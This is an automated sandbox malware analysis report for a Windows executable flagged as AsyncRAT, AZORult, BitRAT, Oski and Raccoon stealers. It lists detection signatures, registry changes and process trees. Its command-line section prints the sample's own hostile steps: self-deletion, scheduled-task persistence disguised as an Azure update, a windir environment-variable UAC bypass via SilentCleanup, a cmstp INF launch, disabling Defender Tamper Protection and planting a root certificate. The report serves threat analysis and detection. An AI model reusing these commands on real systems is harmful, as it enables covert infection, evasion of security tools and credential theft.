Malware Analysis Report

2024-09-22 21:56

Sample ID 210805-3n1f6kvxje
Target 7fb10b8ea68c1e0064730018fca3cb39.exe
SHA256 29cf2aec62c3504b1914484feff17ae470b51229b1df06f1a30334a08b6db12a
Tags
asyncrat azorult bitrat oski raccoon fe25b858c52ebb889260990dc343e5dbcf4a96e4 discovery evasion infostealer persistence rat spyware stealer suricata trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

29cf2aec62c3504b1914484feff17ae470b51229b1df06f1a30334a08b6db12a

Threat Level: Known bad

The file 7fb10b8ea68c1e0064730018fca3cb39.exe was found to be: Known bad.

Malicious Activity Summary

asyncrat azorult bitrat oski raccoon fe25b858c52ebb889260990dc343e5dbcf4a96e4 discovery evasion infostealer persistence rat spyware stealer suricata trojan upx

Raccoon

Modifies Windows Defender Real-time Protection settings

Oski

Azorult

suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

Contains code to disable Windows Defender

AsyncRat

BitRAT

suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M1

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

BitRAT Payload

suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M18

Raccoon Stealer Payload

Async RAT payload

Downloads MZ/PE file

Executes dropped EXE

UPX packed file

Loads dropped DLL

Reads user/profile data of web browsers

Windows security modification

Reads user/profile data of local email clients

Deletes itself

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Checks installed software on the system

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Kills process with taskkill

Suspicious use of SetWindowsHookEx

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Modifies system certificate store

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Checks processor information in registry

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

Modifies registry key

MITRE ATT&CK Matrix V6

Analysis: static1

Detonation Overview

Reported

2021-08-05 10:31

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-08-05 10:31

Reported

2021-08-05 10:33

Platform

win7v20210410

Max time kernel

138s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe"

Signatures

AsyncRat

rat asyncrat

Azorult

trojan infostealer azorult

BitRAT

trojan bitrat

BitRAT Payload

Description Indicator Process Target
N/A N/A N/A N/A

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Oski

infostealer oski

Raccoon

stealer raccoon

Raccoon Stealer Payload

Description Indicator Process Target
N/A N/A N/A N/A

suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

suricata

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

suricata

suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

suricata

suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M1

suricata

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\ProgramData\GFDyrtucbvfdg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8GGn8x0ymA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iw2xxaKP8C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\k3hnMCzeNI.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4fBv2zvEYi.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\iw2xxaKP8C.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\iw2xxaKP8C.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\Abthdwq = "C:\\Users\\Public\\Libraries\\qwdhtbA.url" C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\Ceutdxb = "C:\\Users\\Public\\Libraries\\bxdtueC.url" C:\Users\Admin\AppData\Local\Temp\8GGn8x0ymA.exe N/A

Checks installed software on the system

discovery

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\k3hnMCzeNI.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\ProgramData\GFDyrtucbvfdg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\k3hnMCzeNI.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1096 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 1096 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 1096 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 1096 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 1096 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 1096 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 1096 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 1096 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 2028 wrote to memory of 1980 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 2028 wrote to memory of 1980 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 2028 wrote to memory of 1980 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 2028 wrote to memory of 1980 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 2028 wrote to memory of 1980 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 1096 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe
PID 1096 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe
PID 1096 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe
PID 1096 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe
PID 1096 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe
PID 1164 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 1164 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 1164 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 1164 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 1164 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 1340 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\4fBv2zvEYi.exe
PID 1340 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\4fBv2zvEYi.exe
PID 1340 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\4fBv2zvEYi.exe
PID 1340 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\4fBv2zvEYi.exe
PID 1340 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe
PID 1340 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe
PID 1340 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe
PID 1340 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe
PID 1340 wrote to memory of 748 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\k3hnMCzeNI.exe
PID 1340 wrote to memory of 748 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\k3hnMCzeNI.exe
PID 1340 wrote to memory of 748 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\k3hnMCzeNI.exe
PID 1340 wrote to memory of 748 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\k3hnMCzeNI.exe
PID 1340 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\iw2xxaKP8C.exe
PID 1340 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\iw2xxaKP8C.exe
PID 1340 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\iw2xxaKP8C.exe
PID 1340 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\iw2xxaKP8C.exe
PID 1340 wrote to memory of 1160 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\8GGn8x0ymA.exe
PID 1340 wrote to memory of 1160 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\8GGn8x0ymA.exe
PID 1340 wrote to memory of 1160 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\8GGn8x0ymA.exe
PID 1340 wrote to memory of 1160 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\8GGn8x0ymA.exe
PID 1340 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Windows\SysWOW64\cmd.exe
PID 1340 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Windows\SysWOW64\cmd.exe
PID 1340 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Windows\SysWOW64\cmd.exe
PID 1340 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Windows\SysWOW64\cmd.exe
PID 1216 wrote to memory of 1792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1216 wrote to memory of 1792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1216 wrote to memory of 1792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1216 wrote to memory of 1792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1756 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Windows\SysWOW64\cmd.exe
PID 1756 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Windows\SysWOW64\cmd.exe
PID 1756 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Windows\SysWOW64\cmd.exe
PID 1756 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Windows\SysWOW64\cmd.exe
PID 1536 wrote to memory of 1464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1536 wrote to memory of 1464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1536 wrote to memory of 1464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1536 wrote to memory of 1464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1612 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe
PID 1612 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe
PID 1612 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe
PID 1612 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe
PID 1612 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe

Processes

C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe

"C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe"

C:\ProgramData\GFDyrtucbvfdg.exe

"C:\ProgramData\GFDyrtucbvfdg.exe"

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

"C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe"

C:\ProgramData\GFDyrtucbvfdg.exe

"C:\ProgramData\GFDyrtucbvfdg.exe"

C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe

"C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe"

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

"C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe"

C:\Users\Admin\AppData\Local\Temp\4fBv2zvEYi.exe

"C:\Users\Admin\AppData\Local\Temp\4fBv2zvEYi.exe"

C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe

"C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe"

C:\Users\Admin\AppData\Local\Temp\iw2xxaKP8C.exe

"C:\Users\Admin\AppData\Local\Temp\iw2xxaKP8C.exe"

C:\Users\Admin\AppData\Local\Temp\k3hnMCzeNI.exe

"C:\Users\Admin\AppData\Local\Temp\k3hnMCzeNI.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe"

C:\Users\Admin\AppData\Local\Temp\8GGn8x0ymA.exe

"C:\Users\Admin\AppData\Local\Temp\8GGn8x0ymA.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /T 10 /NOBREAK

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /pid 1756 & erase C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe & RD /S /Q C:\\ProgramData\\432965539998401\\* & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /pid 1756

C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe

"C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Public\Trast.bat" "

C:\Users\Admin\AppData\Local\Temp\8GGn8x0ymA.exe

"C:\Users\Admin\AppData\Local\Temp\8GGn8x0ymA.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"

C:\Windows\SysWOW64\reg.exe

reg delete hkcu\Environment /v windir /f

C:\Users\Admin\AppData\Local\Temp\iw2xxaKP8C.exe

"{path}"

C:\Windows\SysWOW64\reg.exe

reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "

C:\Windows\SysWOW64\schtasks.exe

schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I

C:\Users\Admin\AppData\Local\Temp\k3hnMCzeNI.exe

"{path}"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dCtjCu" /XML "C:\Users\Admin\AppData\Local\Temp\tmpF1FD.tmp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

\??\c:\windows\SysWOW64\cmstp.exe

"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\qlmkdkl1.inf

C:\Users\Admin\AppData\Local\Temp\4fBv2zvEYi.exe

"{path}"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Public\nest.bat" "

C:\Windows\SysWOW64\reg.exe

reg delete hkcu\Environment /v windir /f

C:\Windows\system32\taskeng.exe

taskeng.exe {0330DFA1-77A4-4383-80D8-94115E19A849} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

